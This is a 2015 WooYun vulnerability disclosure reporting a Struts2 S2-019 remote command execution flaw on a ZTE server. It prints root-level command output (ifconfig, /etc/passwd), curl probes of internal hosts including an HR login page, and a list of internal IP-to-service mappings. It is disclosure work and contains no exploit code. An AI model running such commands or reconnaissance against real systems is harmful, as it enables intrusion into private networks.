当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150400

漏洞标题:中兴某服务器存在远程命令执行漏洞(可穿透边界防火墙连通内网)

相关厂商:中兴通讯股份有限公司

漏洞作者: hecate

提交时间:2015-10-29 19:46

修复时间:2015-12-14 09:22

公开时间:2015-12-14 09:22

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

中兴某服务器存在远程命令执行漏洞(可穿透边界防火墙连通内网)

详细说明:

地址 http://media.moa.zte.com.cn/mpp/MsgView.action 存在远程命令执行
root权限

Useage: S2-019 
Whoami: root
WebPath: /home/mpp/mpp/


可以为所欲为

ifconfig
========================================================================================
eth0      Link encap:Ethernet  HWaddr 00:50:56:95:69:1A  
          inet addr:10.30.7.188  Bcast:10.30.255.255  Mask:255.255.0.0
          inet6 addr: fe80::250:56ff:fe95:691a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1014612456 errors:0 dropped:0 overruns:0 frame:0
          TX packets:69261279 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:89057411709 (82.9 GiB)  TX bytes:42866600899 (39.9 GiB)
eth9      Link encap:Ethernet  HWaddr 00:50:56:95:E1:02  
          inet addr:10.3.38.71  Bcast:10.3.38.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe95:e102/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:156889875 errors:0 dropped:0 overruns:0 frame:0
          TX packets:141490610 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:34097163769 (31.7 GiB)  TX bytes:48721795888 (45.3 GiB)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:3332551 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3332551 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:3960736553 (3.6 GiB)  TX bytes:3960736553 (3.6 GiB)


cat /etc/resolv.conf
========================================================================================
# Generated by NetworkManager
nameserver 10.30.1.10
cat /etc/hosts
========================================================================================
127.0.0.1   MPPPRODDB1
::1         MPPPRODDB1


cat /etc/passwd
========================================================================================
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
cimsrvr:x:499:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
qpidd:x:496:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
amandabackup:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
qemu:x:107:107:qemu user:/:/sbin/nologin
memcached:x:495:493:Memcached daemon:/var/run/memcached:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
pulse:x:494:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
itadmin:x:500:502:itadmin:/home/itadmin:/bin/bash
ftpuser:x:501:50::/home/ftpuser:/sbin/nologin


可连通内网某些服务器

curl 10.30.4.22
========================================================================================
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Welcome to JBoss&trade;</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link rel="StyleSheet" href="jboss.css" type="text/css"/>
</head>
<body>
<!-- header begin -->
   <a href="http://www.jboss.org">
      <img src="logo.gif" alt="JBoss" id="logo" width="226" height="105" />
   </a>
   <div id="header">&nbsp;</div>
   <div id="navigation_bar"></div>
<!-- header end -->
   <h3>JBoss Online Resources</h3>
   <ul>
      <li><a href="http://www.jboss.org/products/jbossas/docs">JBoss Documentation</a></li>
      <li><a href="http://wiki.jboss.org/">JBoss Wiki</a></li>
      <li><a href="http://jira.jboss.org/">JBoss JIRA</a></li>      
      <li><a href="http://www.jboss.org/index.html?module=bb">JBoss Forums</a></li>
   </ul>
   <h3>JBoss Management</h3>
   <ul>
      <li><a href="/status">Tomcat status</a>
          <a href="/status?full=true">(full)</a>
          <a href="/status?XML=true">(XML)</a></li>
      <li><a href="/jmx-console/">JMX Console</a></li>
      <li><a href="/web-console/">JBoss Web Console</a></li>
   </ul>
<!-- footer begin -->
   <div id="footer">
      <div id="credits">JBoss&trade; Application Server</div>
      <div id="footer_bar">&nbsp;</div>
   </div>
<!-- footer end -->
</body>
</html>


到达人事在线

curl hr.zte.com.cn/hronline/login.aspx
=======================================================================================
<HTML>
	<HEAD>
		<title>HRM-HOL人事在线系统</title>
		<META content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
		<link href="css/loginEn.css" rel="stylesheet" type="text/css" />
		<META http-equiv="Content-Type" content="text/html; charset=gb2312">
		<META http-equiv="pragma" content="no-cache">
		<META http-equiv="Cache-Control" content="no-cache, must-revalidate">
		<META http-equiv="expires" content="0">
		<META content="MSHTML 6.00.2800.1479" name="GENERATOR">
		
		<SCRIPT language="javascript" src="/HROnline/Cn_HROnline/js/hidemenu.js" type="text/javascript"></SCRIPT>
		<SCRIPT language="javaScript" src="/HROnline/Cn_HROnline/js/advv.js" type="text/javascript"></SCRIPT>
		<SCRIPT language="javascript">Adv("","","","<img src='/HROnline/Cn_HROnline/images/pros.jpg' alt='HROnline' border='0'>","HROnline- 提示信息");</SCRIPT>
		<SCRIPT language="javascript">Adv("","");</SCRIPT>
		<script src="js/CollectUserData.js"></script>
		<script src="js/xxtea.js"></script>
	</HEAD>
	<BODY onload="pwdsetfocus()">
		<!--------------新界面-------------------->
		<div class="login" style="FONT-FAMILY: Arial, Helvetica, '宋体',sans-serif">
			<div class="login_logo">
				<div class="version">V10.3.3</div>
				<img src="images/login/login_sys_logo.png" width="238" height="49">
			</div>
			<div class="login_area login_dc">
				<div id="language">
					<label><input type="radio" name="languageSelect" class="radio" value="中文" onclick="javascript:return languageChange2(this)"
							checked>中文</label>&nbsp; <label><input type="radio" name="languageSelect" class="radio" value="English" onclick="javascript:return languageChange2(this)">English</label>
				</div>
				<form name="login" method="post" action="login.aspx" id="login">
<input type="hidden" name="hiddenLoginLogOut" id="hiddenLoginLogOut" value="true" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTYzMTQ4NTQwOA9kFgJmD2QWBAIDDw9kFgIeCW9ua2V5ZG93bgULaGlkZWVycm9yKClkAgUPD2QWAh4HT25DbGljawUUcmV0dXJuIHN1Ym1pdEZvcm0oKTtkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZzdWJtaXR34Eu4e97vJoE8rX+oPKNSj4DFCg==" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALSkZXuBQLr/4HeAgKyxeCRDwLcu4S2BJ8q0uZtpJpFwn/xxharlvuUUhue" />
					<div id="login_input1">
						<span class="login_title">用户名</span>
						<input name="UserId" type="text" id="UserId" title="请输入IC卡号后八位" class="login_txt" onkeydown="keyPressInUser()" name="UserId" />
					</div>
					<div id="login_input2">
						<span class="login_title">密&nbsp;&nbsp;&nbsp; 码</span>
						<input name="PassWord" type="password" id="PassWord" title="请输入密码" class="login_txt" onkeydown="hideerror()" />
					</div>
					<div class="login_help">
						<A href="javascript:void(0);" target="_self" onclick="javascript:openhelp(2); return false;"
							style="POSITION: relative; TOP: -4px">无法登录?</A> 
						<!--<a disabled style="POSITION: relative; TOP: -4px">无法登录?</a>-->
						<input type="image" name="submit" id="submit" src="/HROnline/images/login/login_btn.png" border="0" onclick="return submitForm();" language="javascript" /></div>
				</form>
			</div>
			<DIV id="loginerror" style="VISIBILITY:hidden" class="wrong_info"><FONT color="red">密码出错,请重新输入密码或与系统管理员联系</FONT></DIV>
			<div id="dc_login">
				<FORM name="form1" action="loginca1.aspx?lang=CN" method="post" cellspacing="0" cellpadding="0"
					id="form1" onsubmit="return CheckDigiPWD();">
					<div id="login_input3">
						<span class="login_title">数字证书</span> <INPUT id="txtDigiPwd" class="login_txt" style="WIDTH: 110px" type="password" size="8"
							name="psw">
					</div>
					<div class="login_help help_dc" align="right">
						<A href="javascript:void(0);" target="_self" onclick="javascript:openhelp(1); return false;"
							style="POSITION: relative; TOP: -4px">无法登录?</A> <INPUT id="Submit_2" type="image" width="45" src="/HROnline/images/login/login_btn.png"
							value="登录" name="Submit_2">&nbsp; <input type="hidden" name='Type' id="Type1">
						<input type="hidden" name='ReturnUrl' id="ReturnUrl">
					</div>
				</FORM>
			</div>
			<div class="login_info info_dc">
				<input name="hidPostback" type="hidden" id="hidPostback" value="0" />
				<div id="tips" style="BACKGROUND-COLOR: transparent  ; font-size: 12px ;color: red;font-weight:500; font-family: Times ">提示:请输入14位工号的后8位和人事在线的密码登录</div>
				<div id="hotline">如有问题请拨打云服务热线:0755-26778888</div>
			</div>
			<div id="login_bottom">
				<div id="copyright">&copy;2004-2015
					中兴通讯股份有限公司 版权所有</div>
			</div>
			<DIV id="help"></DIV>
			<DIV id="divMess" style="DISPLAY: none"></DIV>
			<DIV id="divErrorType" style="DISPLAY: none"></DIV>
			<!--登录出错信息-->
			<div id="wrong_info_dc" class="wrong_info dc" style="VISIBILITY:hidden">
				请输入数字证书密码!&nbsp;&nbsp;
			</div>
			<!--登录出错信息end-->
		</div>
		
		<SCRIPT language="javascript">	
		var key = 'hol2012';
	    var lock = false;
	    var lockca = false;
		
		//数字证书密码加密 	
	    function newEncodeCA() 
	    {
		    if (lockca)
			{
			   return;
			}
			
	        var xt = new Xxtea(key);
	        var pwd = document.getElementById("txtDigiPwd");
	        pwd.value = xt.xxtea_encrypt(pwd.value);
            lockca = true;
	    }  
		    
		//密码加密    
	    function newEncode() 
	    {
		   if (lock)
			{
			   return;
			}
			
            var xt = new Xxtea(key);
            var pwd = document.getElementById("PassWord");
            pwd.value = xt.xxtea_encrypt(pwd.value);                    
			lock = true;
           
        }         
       
        //输入框设定焦点
		function pwdsetfocus()
		{	    
            //第一次登录
		    if ( document.getElementById('hidPostback').value == "0" )
		    {	
		       var isLogOut = document.all["hiddenLoginLogOut"];
		       if (isLogOut == null)
		       {
					document.location = "HRMain.aspx?Version=Cn";
					return;
		       }		   
		    }
	
			document.login.UserId.value=GetCookie("myusername");
			if(document.login.UserId.value == "")
			{
				document.login.UserId.focus();
			}
			else
			{
				document.login.PassWord.focus();
			}
			
		}
		
		function getQueryString(name) 
        {     // 如果链接没有参数,或者链接中不存在我们要获取的参数,直接返回空     
	        if(location.href.indexOf("?")==-1 || location.href.indexOf(name+'=')==-1)     
	        {         
		        return '';     
	        }      
	        // 获取链接中参数部分     
	        var queryString = location.href.substring(location.href.indexOf("?")+1);      
	        // 分离参数对 ?key=value&key2=value2     
	        var parameters = queryString.split("&");      
	        var pos, paraName, paraValue;     
	        for(var i=0; i<parameters.length; i++)     
	        {         
		        // 获取等号位置         
		        pos = parameters[i].indexOf('=');         
		        if(pos == -1) 
		        { 
			        continue; 
		        }          
		        // 获取name 和 value         
		        paraName = parameters[i].substring(0, pos);         
		        paraValue = parameters[i].substring(pos + 1);          
		        // 如果查询的name等于当前name,就返回当前值,同时,将链接中的+号还原成空格         
		        if(paraName == name)         
		        {             
			        return unescape(paraValue.replace(/\+/g, " "));         
		        }     
	        }     
		        return ''; 
        }	
        
        //隐藏错误提示
		function hideerror() {
			if(document.all.loginerror.style.visibility != "hidden")
			{
				document.all.loginerror.style.visibility = "hidden";
			}
		}
		
		//中英文切换	
		function languageChange2(obj)
		{
		    if (obj != null)
		    {
		        var selectedLan = obj.value;
		        switch(selectedLan)
				{
					case "中文":
						location.href("login.aspx?LoginFlag=1");
						break;
					case "English":
						location.href("Enlogin.aspx?LoginFlag=1");
						break;
				}
			}
		}
		
		function CheckDigiPWD() 
		{
		    var strPwd = document.getElementById("txtDigiPwd").value;
		   
		    
		    if (strPwd == "")
		    {
		        document.getElementById("loginerror").style.visibility = "hidden";
		        document.getElementById("wrong_info_dc").style.visibility = "";
		        //alert("数字证书密码不能为空!");
		        CheckClick();
		        return false;
		    }
            //密码加密
		    newEncodeCA();
		    
		    return true;
		}
		
		//无法打开链接
		function openhelp(i)
		{
		   if(i==1)
		   {
		     window.open("http://it.zte.com.cn/ITS/FAQ/FaqDetail.aspx?FaqID=1909408&menuId=120101","FAQ","height=820,top = 20,left=100,menubar=no,location=no,scrollbars=yes");
		   }
		   else
		   {
		     window.open("http://it.zte.com.cn/ITS/FAQ/FaqDetail.aspx?FaqID=1909403&menuId=120101","FAQ","height=650,top = 20,left=100,menubar=no,location=no,scrollbars=yes");
		   }
		   
		   return false;
		}
			
		</SCRIPT>
		<SCRIPT language="JavaScript">	   
	    
		function submitForm() {
			var value = document.login.UserId.value;
			SetCookie("myusername", value, 365);
			//增加密码加密
			newEncode();
			
			document.login.submit();
		}
		
		//用户名文本回车响应
		function keyPressInUser() {
			var keyValue;
			keyValue=window.event.keyCode;
			
			if(keyValue==13) {
			if(document.login.PassWord.value.length>=6) {
			submitForm();
			} else {
			document.login.PassWord.focus();
			}
			event.returnValue = false;
			}
			
		}
        //密码输入框回车响应
		function keyPressInPassword() {
			var keyValue;
			keyValue=window.event.keyCode;
			if(keyValue==13)
			submitForm();
			
			
		}
		function CodeCookie(str) 
		{ 
 		var strRtn=""; 
 		for (var i=str.length-1;i>=0;i--) 
 		{ 
  		strRtn+=str.charCodeAt(i); 
  		if (i) strRtn+="a";
 		} 
 		return strRtn; 
		} 
		function DecodeCookie(str) 
		{ 
 		var strArr; 
 		var strRtn=""; 
 		strArr=str.split("a"); 
 		for (var i=strArr.length-1;i>=0;i--) 
 		strRtn+=Str


漏洞证明:

以下是内网探测结果 速度略慢

192.168.170.51   http://job.zte.com.cn/cn/
192.168.170.56   https://moa.zte.com.cn/Application/MainFrame/Login.aspx?method=GET
192.168.170.60   http://prm.zte.com.cn
192.168.170.77   http://epmhk01.zte.com.cn/PME/webprojLogin.jsp
192.168.170.103  http://citrix.zte.com.cn
10.30.6.17       http://itsm.zte.com.cn/arsys
10.30.7.75       http://itop.zte.com.cn
10.30.1.212      http://visa.zte.com.cn
10.30.1.210      http://pal.zte.com.cn
10.30.1.174      http://hr.zte.com.cn/hronline/login.aspx
10.30.1.228      http://ecc.zte.com.cn/ecc/login.do

修复方案:

打补丁

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-30 09:20

厂商回复:

感谢对中兴安全的关注

最新状态:

暂无

漏洞评价:

评论

  1. 2015-10-29 20:01 | if、so 认证白帽子 ( 核心白帽子 | Rank:1052 漏洞数:94 | 梦想还是要有的,万一实现了呢?)

    猪猪侠体

  2. 2015-10-29 20:37 | hecate ( 普通白帽子 | Rank:569 漏洞数:89 | ®高级安全工程师 | WooYun认证√)

    @if、so 纯属依葫芦画瓢

  3. 2015-10-29 20:47 | qhwlpg ( 普通白帽子 | Rank:245 漏洞数:63 | 潜心代码审计。)

    mark